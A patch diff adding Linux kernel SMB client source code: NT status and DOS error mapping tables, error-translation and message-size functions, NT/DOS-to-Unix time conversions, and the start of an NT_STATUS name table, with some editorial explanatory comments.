++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_VARIANT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DOMAIN_CONTROLLER_NOT_FOUND}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_ACCOUNT_LOCKED_OUT}, {
++	ERRDOS, ERRbadfid, NT_STATUS_HANDLE_NOT_CLOSABLE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CONNECTION_REFUSED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_GRACEFUL_DISCONNECT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ADDRESS_ALREADY_ASSOCIATED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ADDRESS_NOT_ASSOCIATED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CONNECTION_INVALID}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CONNECTION_ACTIVE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NETWORK_UNREACHABLE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_HOST_UNREACHABLE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PROTOCOL_UNREACHABLE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PORT_UNREACHABLE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_REQUEST_ABORTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CONNECTION_ABORTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_COMPRESSION_BUFFER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_USER_MAPPED_FILE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_AUDIT_FAILED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_TIMER_RESOLUTION_NOT_SET}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CONNECTION_COUNT_LIMIT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LOGIN_TIME_RESTRICTION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LOGIN_WKSTA_RESTRICTION}, {
++	ERRDOS, 193, NT_STATUS_IMAGE_MP_UP_MISMATCH}, {
++	ERRHRD, ERRgeneral, 0xc000024a}, {
++	ERRHRD, ERRgeneral, 0xc000024b}, {
++	ERRHRD, ERRgeneral, 0xc000024c}, {
++	ERRHRD, ERRgeneral, 0xc000024d}, {
++	ERRHRD, ERRgeneral, 0xc000024e}, {
++	ERRHRD, ERRgeneral, 0xc000024f}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INSUFFICIENT_LOGON_INFO}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_DLL_ENTRYPOINT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_SERVICE_ENTRYPOINT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LPC_REPLY_LOST}, {
++	ERRHRD, ERRgeneral, NT_STATUS_IP_ADDRESS_CONFLICT1}, {
++	ERRHRD, ERRgeneral, NT_STATUS_IP_ADDRESS_CONFLICT2}, {
++	ERRHRD, ERRgeneral, NT_STATUS_REGISTRY_QUOTA_LIMIT}, {
++	ERRSRV, 3, NT_STATUS_PATH_NOT_COVERED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_CALLBACK_ACTIVE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LICENSE_QUOTA_EXCEEDED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PWD_TOO_SHORT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PWD_TOO_RECENT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PWD_HISTORY_CONFLICT}, {
++	ERRHRD, ERRgeneral, 0xc000025d}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PLUGPLAY_NO_DEVICE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNSUPPORTED_COMPRESSION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_HW_PROFILE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_PLUGPLAY_DEVICE_PATH}, {
++	ERRDOS, 182, NT_STATUS_DRIVER_ORDINAL_NOT_FOUND}, {
++	ERRDOS, 127, NT_STATUS_DRIVER_ENTRYPOINT_NOT_FOUND}, {
++	ERRDOS, 288, NT_STATUS_RESOURCE_NOT_OWNED}, {
++	ERRDOS, ErrTooManyLinks, NT_STATUS_TOO_MANY_LINKS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_QUOTA_LIST_INCONSISTENT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FILE_IS_OFFLINE}, {
++	ERRDOS, 21, 0xc000026e}, {
++	ERRDOS, 161, 0xc0000281}, {
++	ERRDOS, ERRnoaccess, 0xc000028a}, {
++	ERRDOS, ERRnoaccess, 0xc000028b}, {
++	ERRHRD, ERRgeneral, 0xc000028c}, {
++	ERRDOS, ERRnoaccess, 0xc000028d}, {
++	ERRDOS, ERRnoaccess, 0xc000028e}, {
++	ERRDOS, ERRnoaccess, 0xc000028f}, {
++	ERRDOS, ERRnoaccess, 0xc0000290}, {
++	ERRDOS, ERRbadfunc, 0xc000029c}, {
++	ERRDOS, ERRsymlink, NT_STATUS_STOPPED_ON_SYMLINK}, {
++	ERRDOS, ERRinvlevel, 0x007c0001}, {
++	0, 0, 0 }
++};
++
++/*****************************************************************************
++ Print an error message from the status code
++ *****************************************************************************/
++static void
++cifs_print_status(__u32 status_code)
++{
++	int idx = 0;
++
++	while (nt_errs[idx].nt_errstr != NULL) {
++		if (((nt_errs[idx].nt_errcode) & 0xFFFFFF) ==
++		    (status_code & 0xFFFFFF)) {
++			pr_notice("Status code returned 0x%08x %s\n",
++				  status_code, nt_errs[idx].nt_errstr);
++		}
++		idx++;
++	}
++	return;
++}
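++
++/*
++ * Illustrative note (editorial aside, not upstream commentary): the
++ * comparison above masks both sides with 0xFFFFFF, so only the low
++ * 24 bits are compared; the severity bits (and the top facility
++ * bits) are ignored.  E.g. a returned status of 0xC0000022 matches
++ * the NT_STATUS_ACCESS_DENIED entry because both sides reduce to
++ * 0x000022 after masking.
++ */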
++
++
++static void
++ntstatus_to_dos(__u32 ntstatus, __u8 *eclass, __u16 *ecode)
++{
++	int i;
++	if (ntstatus == 0) {
++		*eclass = 0;
++		*ecode = 0;
++		return;
++	}
++	for (i = 0; ntstatus_to_dos_map[i].ntstatus; i++) {
++		if (ntstatus == ntstatus_to_dos_map[i].ntstatus) {
++			*eclass = ntstatus_to_dos_map[i].dos_class;
++			*ecode = ntstatus_to_dos_map[i].dos_code;
++			return;
++		}
++	}
++	*eclass = ERRHRD;
++	*ecode = ERRgeneral;
++}
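++
++/*
++ * Worked example (editorial sketch): for a response carrying
++ * NT_STATUS_ACCESS_DENIED (0xC0000022), the loop above stops at the
++ * { ERRDOS, ERRnoaccess, NT_STATUS_ACCESS_DENIED } table entry, so
++ * the caller gets *eclass = ERRDOS and *ecode = ERRnoaccess.  Any
++ * status missing from the table falls through to ERRHRD/ERRgeneral.
++ */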
++
++int
++map_smb_to_linux_error(char *buf, bool logErr)
++{
++	struct smb_hdr *smb = (struct smb_hdr *)buf;
++	unsigned int i;
++	int rc = -EIO;	/* on a transport error the SMB error may not be set */
++	__u8 smberrclass;
++	__u16 smberrcode;
++
++	/* BB if NT Status codes - map NT BB */
++
++	/* old style smb error codes */
++	if (smb->Status.CifsError == 0)
++		return 0;
++
++	if (smb->Flags2 & SMBFLG2_ERR_STATUS) {
++		/* translate the newer STATUS codes to old style SMB errors
++		 * and then to POSIX errors */
++		__u32 err = le32_to_cpu(smb->Status.CifsError);
++		if (logErr && (err != (NT_STATUS_MORE_PROCESSING_REQUIRED)))
++			cifs_print_status(err);
++		else if (cifsFYI & CIFS_RC)
++			cifs_print_status(err);
++		ntstatus_to_dos(err, &smberrclass, &smberrcode);
++	} else {
++		smberrclass = smb->Status.DosError.ErrorClass;
++		smberrcode = le16_to_cpu(smb->Status.DosError.Error);
++	}
++
++	/* old style errors */
++
++	/* DOS class smb error codes - map DOS */
++	if (smberrclass == ERRDOS) {
++		/* 1 byte field no need to byte reverse */
++		for (i = 0;
++		     i <
++		     sizeof(mapping_table_ERRDOS) /
++		     sizeof(struct smb_to_posix_error); i++) {
++			if (mapping_table_ERRDOS[i].smb_err == 0)
++				break;
++			else if (mapping_table_ERRDOS[i].smb_err ==
++								smberrcode) {
++				rc = mapping_table_ERRDOS[i].posix_code;
++				break;
++			}
++			/* else try the next error mapping to see if it matches */
++		}
++	} else if (smberrclass == ERRSRV) {
++		/* server class of error codes */
++		for (i = 0;
++		     i <
++		     sizeof(mapping_table_ERRSRV) /
++		     sizeof(struct smb_to_posix_error); i++) {
++			if (mapping_table_ERRSRV[i].smb_err == 0)
++				break;
++			else if (mapping_table_ERRSRV[i].smb_err ==
++								smberrcode) {
++				rc = mapping_table_ERRSRV[i].posix_code;
++				break;
++			}
++			/* else try the next error mapping to see if it matches */
++		}
++	}
++	/* else ERRHRD class errors or junk - return -EIO */
++
++	cifs_dbg(FYI, "Mapping smb error code 0x%x to POSIX err %d\n",
++		 le32_to_cpu(smb->Status.CifsError), rc);
++
++	/* a generic corrective action, e.g. reconnecting the SMB session
++	 * on ERRbaduid, could be added */
++
++	return rc;
++}
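++
++/*
++ * End-to-end sketch (editorial): a server rejecting a request with
++ * NT_STATUS_ACCESS_DENIED is mapped by ntstatus_to_dos() to
++ * ERRDOS/ERRnoaccess, and the ERRDOS table walk above then yields
++ * rc = -EACCES.  A transport failure that never fills in an SMB
++ * error keeps the rc = -EIO default instead.
++ */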
++
++int
++map_and_check_smb_error(struct mid_q_entry *mid, bool logErr)
++{
++	int rc;
++	struct smb_hdr *smb = (struct smb_hdr *)mid->resp_buf;
++
++	rc = map_smb_to_linux_error((char *)smb, logErr);
++	if (rc == -EACCES && !(smb->Flags2 & SMBFLG2_ERR_STATUS)) {
++		/* possible ERRbaduid */
++		__u8 class = smb->Status.DosError.ErrorClass;
++		__u16 code = le16_to_cpu(smb->Status.DosError.Error);
++
++		/* a switch could be used here to handle additional errors */
++		if (class == ERRSRV && code == ERRbaduid) {
++			cifs_dbg(FYI, "Server returned 0x%x, reconnecting session...\n",
++				code);
++			cifs_signal_cifsd_for_reconnect(mid->server, false);
++		}
++	}
++
++	return rc;
++}
++
++
++/*
++ * calculate the size of the SMB message based on the fixed header
++ * portion, the number of word parameters and the data portion of the message
++ */
++unsigned int
++smbCalcSize(void *buf)
++{
++	struct smb_hdr *ptr = buf;
++	return (sizeof(struct smb_hdr) + (2 * ptr->WordCount) +
++		2 /* size of the bcc field */ + get_bcc(ptr));
++}
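++
++/*
++ * Worked example (editorial): for a reply with WordCount = 10 and a
++ * byte count (bcc) of 39, the computed size is
++ *	sizeof(struct smb_hdr) + 2 * 10 + 2 + 39
++ * i.e. the fixed header, ten 16-bit parameter words, the 16-bit bcc
++ * field itself, and 39 bytes of variable data.
++ */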
++
++/* The following are taken from fs/ntfs/util.c */
++
++#define NTFS_TIME_OFFSET ((u64)(369*365 + 89) * 24 * 3600 * 10000000)
++
++/*
++ * Convert the NT UTC (based 1601-01-01, in hundred nanosecond units)
++ * into Unix UTC (based 1970-01-01, in seconds).
++ */
++struct timespec64
++cifs_NTtimeToUnix(__le64 ntutc)
++{
++	struct timespec64 ts;
++	/* BB what about the timezone? BB */
++
++	/* Subtract the NTFS time offset, then convert to 1s intervals. */
++	s64 t = le64_to_cpu(ntutc) - NTFS_TIME_OFFSET;
++	u64 abs_t;
++
++	/*
++	 * Unfortunately we cannot use normal 64-bit division on a 32-bit
++	 * arch, and the alternative, do_div, does not work with negative
++	 * numbers, so those have to be special-cased.
++	 */
++	if (t < 0) {
++		abs_t = -t;
++		ts.tv_nsec = (time64_t)(do_div(abs_t, 10000000) * 100);
++		ts.tv_nsec = -ts.tv_nsec;
++		ts.tv_sec = -abs_t;
++	} else {
++		abs_t = t;
++		ts.tv_nsec = (time64_t)do_div(abs_t, 10000000) * 100;
++		ts.tv_sec = abs_t;
++	}
++
++	return ts;
++}
++
++/* Convert the Unix UTC into NT UTC. */
++u64
++cifs_UnixTimeToNT(struct timespec64 t)
++{
++	/* Convert to 100ns intervals and then add the NTFS time offset. */
++	return (u64) t.tv_sec * 10000000 + t.tv_nsec/100 + NTFS_TIME_OFFSET;
++}
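++
++/*
++ * Sanity check on NTFS_TIME_OFFSET (editorial): 1601..1969 spans 369
++ * years containing 89 leap days (92 years divisible by 4, minus the
++ * non-leap centuries 1700, 1800 and 1900), giving
++ *	(369 * 365 + 89) days * 86400 s/day * 10^7 (100ns units per s).
++ * Hence cifs_NTtimeToUnix(cpu_to_le64(NTFS_TIME_OFFSET)) is the Unix
++ * epoch {0, 0}, and cifs_UnixTimeToNT() of the epoch returns the
++ * offset itself.
++ */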
++
++static const int total_days_of_prev_months[] = {
++	0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334
++};
++
++struct timespec64 cnvrtDosUnixTm(__le16 le_date, __le16 le_time, int offset)
++{
++	struct timespec64 ts;
++	time64_t sec, days;
++	int min, day, month, year;
++	u16 date = le16_to_cpu(le_date);
++	u16 time = le16_to_cpu(le_time);
++	SMB_TIME *st = (SMB_TIME *)&time;
++	SMB_DATE *sd = (SMB_DATE *)&date;
++
++	cifs_dbg(FYI, "date %d time %d\n", date, time);
++
++	sec = 2 * st->TwoSeconds;
++	min = st->Minutes;
++	if ((sec > 59) || (min > 59))
++		cifs_dbg(VFS, "Invalid time min %d sec %lld\n", min, sec);
++	sec += (min * 60);
++	sec += 60 * 60 * st->Hours;
++	if (st->Hours > 24)
++		cifs_dbg(VFS, "Invalid hours %d\n", st->Hours);
++	day = sd->Day;
++	month = sd->Month;
++	if (day < 1 || day > 31 || month < 1 || month > 12) {
++		cifs_dbg(VFS, "Invalid date, month %d day: %d\n", month, day);
++		day = clamp(day, 1, 31);
++		month = clamp(month, 1, 12);
++	}
++	month -= 1;
++	days = day + total_days_of_prev_months[month];
++	days += 3652; /* account for difference in days between 1980 and 1970 */
++	year = sd->Year;
++	days += year * 365;
++	days += (year/4); /* leap year */
++	/* Generalized leap year calculation is more complex, i.e. no leap
++	 * year for years divisible by 100 unless also divisible by 400, but
++	 * since the maximum DOS year value is 2**7, the last year is
++	 * 1980+127, which means we need only consider 2 special case years,
++	 * i.e. the years 2000 and 2100, and only adjust for the missing
++	 * leap year in 2100, as 2000 was a leap year (divisible by 400) */
++	if (year >= 120)  /* the year 2100 */
++		days = days - 1;  /* do not count leap year for the year 2100 */
++
++	/* adjust for leap year where we are still before leap day */
++	if (year != 120)
++		days -= ((year & 0x03) == 0) && (month < 2 ? 1 : 0);
++	sec += 24 * 60 * 60 * days;
++
++	ts.tv_sec = sec + offset;
++
++	/* cifs_dbg(FYI, "sec after cnvrt dos to unix time %d\n",sec); */
++
++	ts.tv_nsec = 0;
++	return ts;
++}
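++
++/*
++ * Decoding example (editorial, assuming the standard DOS packed
++ * layout mirrored by SMB_DATE/SMB_TIME): the date word holds the
++ * year since 1980 in bits 15..9, month in bits 8..5 and day in bits
++ * 4..0, so 0x5783 is year 43 (2023), month 12, day 3; the time word
++ * holds hours in bits 15..11, minutes in bits 10..5 and two-second
++ * units in bits 4..0, so 0x5A01 is 11:16:02.
++ */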
+diff --git a/fs/smb/client/nterr.c b/fs/smb/client/nterr.c
+new file mode 100644
+index 0000000000000..358a766375b4a
+--- /dev/null
++++ b/fs/smb/client/nterr.c
+@@ -0,0 +1,674 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *  Unix SMB/Netbios implementation.
++ *  Version 1.9.
++ *  RPC Pipe client / server routines
++ *  Copyright (C) Luke Kenneth Casson Leighton 1997-2001.
++ */
++
++/* NT error codes - see nterr.h */
++#include <linux/types.h>
++#include <linux/fs.h>
++#include "nterr.h"
++
++const struct nt_err_code_struct nt_errs[] = {
++	{"NT_STATUS_OK", NT_STATUS_OK},
++	{"NT_STATUS_UNSUCCESSFUL", NT_STATUS_UNSUCCESSFUL},
++	{"NT_STATUS_NOT_IMPLEMENTED", NT_STATUS_NOT_IMPLEMENTED},
++	{"NT_STATUS_INVALID_INFO_CLASS", NT_STATUS_INVALID_INFO_CLASS},
++	{"NT_STATUS_INFO_LENGTH_MISMATCH", NT_STATUS_INFO_LENGTH_MISMATCH},
++	{"NT_STATUS_ACCESS_VIOLATION", NT_STATUS_ACCESS_VIOLATION},
++	{"NT_STATUS_BUFFER_OVERFLOW", NT_STATUS_BUFFER_OVERFLOW},
++	{"NT_STATUS_IN_PAGE_ERROR", NT_STATUS_IN_PAGE_ERROR},
++	{"NT_STATUS_PAGEFILE_QUOTA", NT_STATUS_PAGEFILE_QUOTA},
++	{"NT_STATUS_INVALID_HANDLE", NT_STATUS_INVALID_HANDLE},
++	{"NT_STATUS_BAD_INITIAL_STACK", NT_STATUS_BAD_INITIAL_STACK},
++	{"NT_STATUS_BAD_INITIAL_PC", NT_STATUS_BAD_INITIAL_PC},
++	{"NT_STATUS_INVALID_CID", NT_STATUS_INVALID_CID},
++	{"NT_STATUS_TIMER_NOT_CANCELED", NT_STATUS_TIMER_NOT_CANCELED},
++	{"NT_STATUS_INVALID_PARAMETER", NT_STATUS_INVALID_PARAMETER},
++	{"NT_STATUS_NO_SUCH_DEVICE", NT_STATUS_NO_SUCH_DEVICE},
++	{"NT_STATUS_NO_SUCH_FILE", NT_STATUS_NO_SUCH_FILE},
++	{"NT_STATUS_INVALID_DEVICE_REQUEST",
++	 NT_STATUS_INVALID_DEVICE_REQUEST},
++	{"NT_STATUS_END_OF_FILE", NT_STATUS_END_OF_FILE},
++	{"NT_STATUS_WRONG_VOLUME", NT_STATUS_WRONG_VOLUME},
++	{"NT_STATUS_NO_MEDIA_IN_DEVICE", NT_STATUS_NO_MEDIA_IN_DEVICE},
++	{"NT_STATUS_UNRECOGNIZED_MEDIA", NT_STATUS_UNRECOGNIZED_MEDIA},
++	{"NT_STATUS_NONEXISTENT_SECTOR", NT_STATUS_NONEXISTENT_SECTOR},
++	{"NT_STATUS_MORE_PROCESSING_REQUIRED",
++	 NT_STATUS_MORE_PROCESSING_REQUIRED},
++	{"NT_STATUS_NO_MEMORY", NT_STATUS_NO_MEMORY},
++	{"NT_STATUS_CONFLICTING_ADDRESSES",
++	 NT_STATUS_CONFLICTING_ADDRESSES},
++	{"NT_STATUS_NOT_MAPPED_VIEW", NT_STATUS_NOT_MAPPED_VIEW},
++	{"NT_STATUS_UNABLE_TO_FREE_VM", NT_STATUS_UNABLE_TO_FREE_VM},
++	{"NT_STATUS_UNABLE_TO_DELETE_SECTION",
++	 NT_STATUS_UNABLE_TO_DELETE_SECTION},
++	{"NT_STATUS_INVALID_SYSTEM_SERVICE",
++	 NT_STATUS_INVALID_SYSTEM_SERVICE},
++	{"NT_STATUS_ILLEGAL_INSTRUCTION", NT_STATUS_ILLEGAL_INSTRUCTION},
++	{"NT_STATUS_INVALID_LOCK_SEQUENCE",
++	 NT_STATUS_INVALID_LOCK_SEQUENCE},
++	{"NT_STATUS_INVALID_VIEW_SIZE", NT_STATUS_INVALID_VIEW_SIZE},
++	{"NT_STATUS_INVALID_FILE_FOR_SECTION",
++	 NT_STATUS_INVALID_FILE_FOR_SECTION},
++	{"NT_STATUS_ALREADY_COMMITTED", NT_STATUS_ALREADY_COMMITTED},
++	{"NT_STATUS_ACCESS_DENIED", NT_STATUS_ACCESS_DENIED},
++	{"NT_STATUS_BUFFER_TOO_SMALL", NT_STATUS_BUFFER_TOO_SMALL},
++	{"NT_STATUS_OBJECT_TYPE_MISMATCH", NT_STATUS_OBJECT_TYPE_MISMATCH},
++	{"NT_STATUS_NONCONTINUABLE_EXCEPTION",
++	 NT_STATUS_NONCONTINUABLE_EXCEPTION},
++	{"NT_STATUS_INVALID_DISPOSITION", NT_STATUS_INVALID_DISPOSITION},
++	{"NT_STATUS_UNWIND", NT_STATUS_UNWIND},
++	{"NT_STATUS_BAD_STACK", NT_STATUS_BAD_STACK},
++	{"NT_STATUS_INVALID_UNWIND_TARGET",
++	 NT_STATUS_INVALID_UNWIND_TARGET},
++	{"NT_STATUS_NOT_LOCKED", NT_STATUS_NOT_LOCKED},
++	{"NT_STATUS_PARITY_ERROR", NT_STATUS_PARITY_ERROR},
++	{"NT_STATUS_UNABLE_TO_DECOMMIT_VM",
++	 NT_STATUS_UNABLE_TO_DECOMMIT_VM},
++	{"NT_STATUS_NOT_COMMITTED", NT_STATUS_NOT_COMMITTED},
++	{"NT_STATUS_INVALID_PORT_ATTRIBUTES",
++	 NT_STATUS_INVALID_PORT_ATTRIBUTES},
++	{"NT_STATUS_PORT_MESSAGE_TOO_LONG",
++	 NT_STATUS_PORT_MESSAGE_TOO_LONG},
++	{"NT_STATUS_INVALID_PARAMETER_MIX",
++	 NT_STATUS_INVALID_PARAMETER_MIX},
++	{"NT_STATUS_INVALID_QUOTA_LOWER", NT_STATUS_INVALID_QUOTA_LOWER},
++	{"NT_STATUS_DISK_CORRUPT_ERROR", NT_STATUS_DISK_CORRUPT_ERROR},
++	{"NT_STATUS_OBJECT_NAME_INVALID", NT_STATUS_OBJECT_NAME_INVALID},
++	{"NT_STATUS_OBJECT_NAME_NOT_FOUND",
++	 NT_STATUS_OBJECT_NAME_NOT_FOUND},
++	{"NT_STATUS_OBJECT_NAME_COLLISION",
++	 NT_STATUS_OBJECT_NAME_COLLISION},
++	{"NT_STATUS_HANDLE_NOT_WAITABLE", NT_STATUS_HANDLE_NOT_WAITABLE},
++	{"NT_STATUS_PORT_DISCONNECTED", NT_STATUS_PORT_DISCONNECTED},
++	{"NT_STATUS_DEVICE_ALREADY_ATTACHED",
++	 NT_STATUS_DEVICE_ALREADY_ATTACHED},
++	{"NT_STATUS_OBJECT_PATH_INVALID", NT_STATUS_OBJECT_PATH_INVALID},
++	{"NT_STATUS_OBJECT_PATH_NOT_FOUND",
++	 NT_STATUS_OBJECT_PATH_NOT_FOUND},
++	{"NT_STATUS_OBJECT_PATH_SYNTAX_BAD",
++	 NT_STATUS_OBJECT_PATH_SYNTAX_BAD},
++	{"NT_STATUS_DATA_OVERRUN", NT_STATUS_DATA_OVERRUN},
++	{"NT_STATUS_DATA_LATE_ERROR", NT_STATUS_DATA_LATE_ERROR},
++	{"NT_STATUS_DATA_ERROR", NT_STATUS_DATA_ERROR},
++	{"NT_STATUS_CRC_ERROR", NT_STATUS_CRC_ERROR},
++	{"NT_STATUS_SECTION_TOO_BIG", NT_STATUS_SECTION_TOO_BIG},
++	{"NT_STATUS_PORT_CONNECTION_REFUSED",
++	 NT_STATUS_PORT_CONNECTION_REFUSED},
++	{"NT_STATUS_INVALID_PORT_HANDLE", NT_STATUS_INVALID_PORT_HANDLE},
++	{"NT_STATUS_SHARING_VIOLATION", NT_STATUS_SHARING_VIOLATION},
++	{"NT_STATUS_QUOTA_EXCEEDED", NT_STATUS_QUOTA_EXCEEDED},
++	{"NT_STATUS_INVALID_PAGE_PROTECTION",
++	 NT_STATUS_INVALID_PAGE_PROTECTION},
++	{"NT_STATUS_MUTANT_NOT_OWNED", NT_STATUS_MUTANT_NOT_OWNED},
++	{"NT_STATUS_SEMAPHORE_LIMIT_EXCEEDED",
++	 NT_STATUS_SEMAPHORE_LIMIT_EXCEEDED},
++	{"NT_STATUS_PORT_ALREADY_SET", NT_STATUS_PORT_ALREADY_SET},
++	{"NT_STATUS_SECTION_NOT_IMAGE", NT_STATUS_SECTION_NOT_IMAGE},
++	{"NT_STATUS_SUSPEND_COUNT_EXCEEDED",
++	 NT_STATUS_SUSPEND_COUNT_EXCEEDED},
++	{"NT_STATUS_THREAD_IS_TERMINATING",
++	 NT_STATUS_THREAD_IS_TERMINATING},
++	{"NT_STATUS_BAD_WORKING_SET_LIMIT",
++	 NT_STATUS_BAD_WORKING_SET_LIMIT},
++	{"NT_STATUS_INCOMPATIBLE_FILE_MAP",
++	 NT_STATUS_INCOMPATIBLE_FILE_MAP},
++	{"NT_STATUS_SECTION_PROTECTION", NT_STATUS_SECTION_PROTECTION},
++	{"NT_STATUS_EAS_NOT_SUPPORTED", NT_STATUS_EAS_NOT_SUPPORTED},
++	{"NT_STATUS_EA_TOO_LARGE", NT_STATUS_EA_TOO_LARGE},
++	{"NT_STATUS_NONEXISTENT_EA_ENTRY", NT_STATUS_NONEXISTENT_EA_ENTRY},
++	{"NT_STATUS_NO_EAS_ON_FILE", NT_STATUS_NO_EAS_ON_FILE},
++	{"NT_STATUS_EA_CORRUPT_ERROR", NT_STATUS_EA_CORRUPT_ERROR},
++	{"NT_STATUS_FILE_LOCK_CONFLICT", NT_STATUS_FILE_LOCK_CONFLICT},
++	{"NT_STATUS_LOCK_NOT_GRANTED", NT_STATUS_LOCK_NOT_GRANTED},
++	{"NT_STATUS_DELETE_PENDING", NT_STATUS_DELETE_PENDING},
++	{"NT_STATUS_CTL_FILE_NOT_SUPPORTED",
++	 NT_STATUS_CTL_FILE_NOT_SUPPORTED},
++	{"NT_STATUS_UNKNOWN_REVISION", NT_STATUS_UNKNOWN_REVISION},
++	{"NT_STATUS_REVISION_MISMATCH", NT_STATUS_REVISION_MISMATCH},
++	{"NT_STATUS_INVALID_OWNER", NT_STATUS_INVALID_OWNER},
++	{"NT_STATUS_INVALID_PRIMARY_GROUP",
++	 NT_STATUS_INVALID_PRIMARY_GROUP},
++	{"NT_STATUS_NO_IMPERSONATION_TOKEN",
++	 NT_STATUS_NO_IMPERSONATION_TOKEN},
++	{"NT_STATUS_CANT_DISABLE_MANDATORY",
++	 NT_STATUS_CANT_DISABLE_MANDATORY},
++	{"NT_STATUS_NO_LOGON_SERVERS", NT_STATUS_NO_LOGON_SERVERS},
++	{"NT_STATUS_NO_SUCH_LOGON_SESSION",
++	 NT_STATUS_NO_SUCH_LOGON_SESSION},
++	{"NT_STATUS_NO_SUCH_PRIVILEGE", NT_STATUS_NO_SUCH_PRIVILEGE},
++	{"NT_STATUS_PRIVILEGE_NOT_HELD", NT_STATUS_PRIVILEGE_NOT_HELD},
++	{"NT_STATUS_INVALID_ACCOUNT_NAME", NT_STATUS_INVALID_ACCOUNT_NAME},
++	{"NT_STATUS_USER_EXISTS", NT_STATUS_USER_EXISTS},
++	{"NT_STATUS_NO_SUCH_USER", NT_STATUS_NO_SUCH_USER},
++	{"NT_STATUS_GROUP_EXISTS", NT_STATUS_GROUP_EXISTS},
++	{"NT_STATUS_NO_SUCH_GROUP", NT_STATUS_NO_SUCH_GROUP},
++	{"NT_STATUS_MEMBER_IN_GROUP", NT_STATUS_MEMBER_IN_GROUP},
++	{"NT_STATUS_MEMBER_NOT_IN_GROUP", NT_STATUS_MEMBER_NOT_IN_GROUP},
++	{"NT_STATUS_LAST_ADMIN", NT_STATUS_LAST_ADMIN},
++	{"NT_STATUS_WRONG_PASSWORD", NT_STATUS_WRONG_PASSWORD},
++	{"NT_STATUS_ILL_FORMED_PASSWORD", NT_STATUS_ILL_FORMED_PASSWORD},
++	{"NT_STATUS_PASSWORD_RESTRICTION", NT_STATUS_PASSWORD_RESTRICTION},
++	{"NT_STATUS_LOGON_FAILURE", NT_STATUS_LOGON_FAILURE},
++	{"NT_STATUS_ACCOUNT_RESTRICTION", NT_STATUS_ACCOUNT_RESTRICTION},
++	{"NT_STATUS_INVALID_LOGON_HOURS", NT_STATUS_INVALID_LOGON_HOURS},
++	{"NT_STATUS_INVALID_WORKSTATION", NT_STATUS_INVALID_WORKSTATION},
++	{"NT_STATUS_PASSWORD_EXPIRED", NT_STATUS_PASSWORD_EXPIRED},
++	{"NT_STATUS_ACCOUNT_DISABLED", NT_STATUS_ACCOUNT_DISABLED},
++	{"NT_STATUS_NONE_MAPPED", NT_STATUS_NONE_MAPPED},
++	{"NT_STATUS_TOO_MANY_LUIDS_REQUESTED",
++	 NT_STATUS_TOO_MANY_LUIDS_REQUESTED},
++	{"NT_STATUS_LUIDS_EXHAUSTED", NT_STATUS_LUIDS_EXHAUSTED},
++	{"NT_STATUS_INVALID_SUB_AUTHORITY",
++	 NT_STATUS_INVALID_SUB_AUTHORITY},
++	{"NT_STATUS_INVALID_ACL", NT_STATUS_INVALID_ACL},
++	{"NT_STATUS_INVALID_SID", NT_STATUS_INVALID_SID},
++	{"NT_STATUS_INVALID_SECURITY_DESCR",
++	 NT_STATUS_INVALID_SECURITY_DESCR},
++	{"NT_STATUS_PROCEDURE_NOT_FOUND", NT_STATUS_PROCEDURE_NOT_FOUND},
++	{"NT_STATUS_INVALID_IMAGE_FORMAT", NT_STATUS_INVALID_IMAGE_FORMAT},
++	{"NT_STATUS_NO_TOKEN", NT_STATUS_NO_TOKEN},
++	{"NT_STATUS_BAD_INHERITANCE_ACL", NT_STATUS_BAD_INHERITANCE_ACL},
++	{"NT_STATUS_RANGE_NOT_LOCKED", NT_STATUS_RANGE_NOT_LOCKED},
++	{"NT_STATUS_DISK_FULL", NT_STATUS_DISK_FULL},
++	{"NT_STATUS_SERVER_DISABLED", NT_STATUS_SERVER_DISABLED},
++	{"NT_STATUS_SERVER_NOT_DISABLED", NT_STATUS_SERVER_NOT_DISABLED},
++	{"NT_STATUS_TOO_MANY_GUIDS_REQUESTED",
++	 NT_STATUS_TOO_MANY_GUIDS_REQUESTED},
++	{"NT_STATUS_GUIDS_EXHAUSTED", NT_STATUS_GUIDS_EXHAUSTED},
++	{"NT_STATUS_INVALID_ID_AUTHORITY", NT_STATUS_INVALID_ID_AUTHORITY},
++	{"NT_STATUS_AGENTS_EXHAUSTED", NT_STATUS_AGENTS_EXHAUSTED},
++	{"NT_STATUS_INVALID_VOLUME_LABEL", NT_STATUS_INVALID_VOLUME_LABEL},
++	{"NT_STATUS_SECTION_NOT_EXTENDED", NT_STATUS_SECTION_NOT_EXTENDED},
++	{"NT_STATUS_NOT_MAPPED_DATA", NT_STATUS_NOT_MAPPED_DATA},
